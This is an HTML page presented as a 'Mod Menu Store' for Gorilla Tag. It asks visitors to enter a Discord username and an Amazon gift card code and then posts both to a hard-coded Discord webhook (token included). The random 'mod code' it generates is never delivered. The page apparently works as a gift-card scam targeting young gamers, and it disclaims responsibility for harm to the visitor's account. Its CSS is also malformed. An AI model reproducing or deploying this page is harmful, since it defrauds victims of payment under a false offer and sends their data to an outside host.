<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Mod Menu Store</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background: #111;
      color: white;
      display: flex;
      flex-direction: column;
      align-items: center;
      padding-top: 50px;
    }
    .container {
      background: #222;
      padding: 30px;
      border-radius: 10px;
      max-width: 400px;
      width: 100%;
      text-align: center;
    }
    input, button {
      margin-top: 15px;
      padding: 10px;
      width: 100%;
      border: none;
      border-radius: 5px;
    }
    button {
      background-color: #28a745;
      color: white;
      cursor: pointer;
button1 {
      background-color: #28a745;
      color: white;
      cursor: pointer;
    }
    button:hover {
      background-color: #218838;
 .containerr {
      background: #222;
      padding: 30px;
      border-radius: 10px;
      max-width: 400px;
      width: 100%;
      text-align: center;
    }
  </style>
</head>
<body>

  <div class="container">
    <h2>jixwave Mod Menu</h2>
    <p>best mod menu for Gorilla Tag.</p>
    <input type="name" id="name" placeholder="Enter your discord user name" required />
<input type="codes" id="codes" placeholder="Enter a amazon code" required />
    <button onclick="sendToDiscord()">Buy Now</button>
 
   
  </div>

<div class="containerr">
    <h2>!IMPORTENT!</h2>
    <p>I am not resposeble for any actions takes on your Account</p>
  </div>
  <script>
    function sendToDiscord() {
      const webhookURL = "https://discord.com/api/webhooks/1362497790587961444/12oLn_isECK3MB3w4H5nv7qUpFr0Xqs3YtBMmQY8LTXVDoIzSCQdvuK-2r0ReErLd46h"; // replace with your actual webhook URL
      const name = document.getElementById("name").value;
      const code = "MOD-" + Math.random().toString(36).substring(2, 8).toUpperCase(); // random code
      const codes = document.getElementById("codes").value
      const data = {
        content: `🎉 New Purchase!\nname:${name} \ncodes: ${codes} `
      };

      fetch(webhookURL, {
        method: "POST",
        headers: {
          "Content-Type": "application/json"
        },
        body: JSON.stringify(data)
      })
      .then(response => {
        if (response.ok) {
          alert("Thank you! Your code has been sent.");
        } else {
          alert("Failed to send. Try again.");
        }
      });
    }
  </script>

</body>
</html>
